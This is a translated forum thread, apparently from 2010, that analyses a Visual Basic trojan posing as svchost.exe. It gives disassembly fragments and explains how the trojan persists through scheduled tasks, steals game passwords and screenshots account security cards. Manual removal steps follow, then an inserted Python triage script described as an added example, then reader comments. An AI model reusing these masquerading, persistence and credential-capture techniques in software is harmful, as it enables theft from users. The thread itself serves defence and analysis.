004036A0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004036A5   .  FFD0          call eax
004036A7   .  FFE0          jmp eax                                  ;  MapVirtualKeyA

7340CEF2 |. 56 push esi ; /lParam
7340CEF3 |. FF75 0C push [arg.2] ; |wParam
7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx

004033B0   $  A1 80574100   mov eax,dword ptr ds:[415780]
004033B5   .  0BC0          or eax,eax
004033B7   .  74 02         je short svchost.004033BB
004033B9   .  FFE0          jmp eax
004033BB   >  68 98334000   push svchost.00403398                    ;  user32
004033C0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004033C5   .  FFD0          call eax
004033C7   .  FFE0          jmp eax                                  ;  GetDC


733A1BAF . 57 push edi ; /hDC => NULL
733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
733A1BB6 . 3BC7 cmp eax,edi
733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
733A1BC6 . 50 push eax ; |hDC
733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject

004059AB   > \68 88594000   push svchost.00405988                    ;  GDIPlus
004059B0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004059B5   .  FFD0          call eax
004059B7   .  FFE0          jmp eax                                  ;  GdipSaveImageToFile


0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
0040D52F . 6A 00 push 0
0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
0040D534 . 52 push edx


00411B52 . 68 305C4000 push svchost.00405C30 ; Write
00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
00411B5D . 53 push ebx
00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
00411B69 . 51 push ecx
00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
00411B70 . 52 push edx
00411B71 . FFD7 call edi
00411B73 . 83C4 10 add esp,10
00411B76 . 50 push eax
00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
00411B7D . 50 push eax
00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
00411B84 . 83C4 1C add esp,1C
00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411B93 . 53 push ebx
00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411B9C . 50 push eax
00411B9D . 51 push ecx
00411B9E . FFD7 call edi
00411BA0 . 83C4 10 add esp,10
00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
00411BAB . 52 push edx
00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
00411BB2 . 50 push eax
00411BB3 . E8 E8030000 call svchost.00411FA0
00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411BC7 . 53 push ebx
00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
00411BCD . 53 push ebx
00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
00411BD3 . 53 push ebx
00411BD4 . 68 805C4000 push svchost.00405C80 ; All
00411BD9 . 53 push ebx
00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
Summary:
1. Obtain the specified directory, create a folder there, copy itself in, then run.

2. Create a .bat that sets up scheduled tasks to run the trojan at the specified times.

3. Terminate itself.

4. The copied program locates the game window by window lookup and process enumeration, and captures the password.

5. As for the account security card, it takes screenshots and sends them to a specified address.

Given my limited ability, errors and omissions are unavoidable! Perhaps the mechanism isn't as simple as this; I'd ask other experts to give pointers. Many thanks!


Removal method:

First use XueTr.exe to terminate the svchost.exe process (you can't delete it without killing it first), then

go to the directory and delete all files under C:\WINDOWS\system32\Pusmint.

Then run XueTr.exe and switch to the startup-items tab, where it becomes obvious: just delete the *.JOB entries.
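The removal steps above encode an order that matters (terminate first, because a running image cannot be deleted, then the Pusmint directory, then the *.JOB files) and a set of indicators: the Pusmint directory, its svchost.exe, SystemDir.bat, jietu.jpg and the AT job files. The script below is an added example, not from the post or from XueTr; it takes a host snapshot modelled as plain Python data (a process list and a file listing, both constructed here), finds the masquerading svchost.exe and emits the removal steps in that order. It assumes an XP-era layout where AT jobs live in C:\WINDOWS\Tasks and the genuine svchost.exe is only in System32 or SysWOW64; the parent-process check (a real svchost.exe is started by services.exe) is a general heuristic added here, not something the post states.

```python
"""Host triage for the indicators listed in the removal steps above.

Added example, not part of the original post.  A process list and a file
listing stand in for what a tool such as XueTr would show; the functions
derive the post's removal order: kill first, then delete files, then jobs.
"""
import ntpath
from dataclasses import dataclass

PUSMINT_DIR = r"C:\WINDOWS\system32\Pusmint"   # directory named in the post
TASKS_DIR = r"C:\WINDOWS\Tasks"                # assumption: XP-era AT job store
LEGIT_SVCHOST = {                              # assumption: default install on C:
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str    # full image path
    parent: str   # parent process name


# Constructed host snapshot: one genuine svchost.exe and the trojan's copy.
SAMPLE_PROCS = [
    Proc(4, r"C:\WINDOWS\system32\services.exe", "winlogon.exe"),
    Proc(860, r"C:\WINDOWS\system32\svchost.exe", "services.exe"),
    Proc(1724, r"C:\WINDOWS\system32\Pusmint\svchost.exe", "svchost.exe"),
]
SAMPLE_FILES = [
    r"C:\WINDOWS\Tasks\At1.job",
    r"C:\WINDOWS\Tasks\At2.job",
    r"C:\WINDOWS\Tasks\SA.DAT",
    r"C:\WINDOWS\system32\Pusmint\svchost.exe",
    r"C:\WINDOWS\system32\Pusmint\SystemDir.bat",
    r"C:\WINDOWS\system32\Pusmint\jietu.jpg",
    r"C:\WINDOWS\system32\svchost.exe",
]


def is_under(path, directory):
    """Case-insensitive 'path lies inside directory' test for Windows paths."""
    p, d = ntpath.normcase(path), ntpath.normcase(directory)
    return p.startswith(d.rstrip("\\") + "\\")


def suspicious_svchost(procs):
    """svchost.exe instances that live outside System32/SysWOW64 (the post's
    indicator) or were not started by services.exe (general heuristic)."""
    hits = []
    for p in procs:
        if ntpath.basename(p.image).lower() != "svchost.exe":
            continue
        wrong_path = p.image.lower() not in LEGIT_SVCHOST
        wrong_parent = p.parent.lower() != "services.exe"
        if wrong_path or wrong_parent:
            hits.append((p, "path" if wrong_path else "parent"))
    return hits


def removal_plan(procs, files):
    """Ordered (action, target) steps: terminate, then delete files, then delete jobs."""
    steps = []
    for p, reason in suspicious_svchost(procs):
        steps.append(("terminate", f"pid {p.pid} ({reason}: {p.image})"))
    for f in files:
        if is_under(f, PUSMINT_DIR):
            steps.append(("delete", f))
    for f in files:
        if is_under(f, TASKS_DIR) and f.lower().endswith(".job"):
            steps.append(("delete_job", f))
    return steps


if __name__ == "__main__":
    for action, target in removal_plan(SAMPLE_PROCS, SAMPLE_FILES):
        print(f"{action:11} {target}")
```

The genuine svchost.exe (pid 860) passes both checks and never appears in the plan; the copy in Pusmint is caught by the path check alone, so the parent heuristic only matters for variants that copy themselves into a legitimate-looking location.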


Hmily posted on 2010-3-14 03:36
Why is this code formatting so ugly....
黑客猪猪 posted on 2010-3-9 11:50
gorden posted on 2010-3-8 23:48
hxy100 posted on 2010-5-4 03:58
Genius, the analysis is so deep.
smallyou93 posted on 2010-3-15 19:46
Damn, it's actually VB...
wanshaoling520 posted on 2010-3-13 19:28
Boss, can you just tell us which address to look at to confirm whether the trojan is there? I'm a newbie; if not, never mind.
ji8123 posted on 2011-2-28 11:04
My god, I can't understand it, really impressive.
alasnow posted on 2011-3-28 00:26
It's so long.
雨牧 posted on 2011-7-21 08:33
I really can't understand it.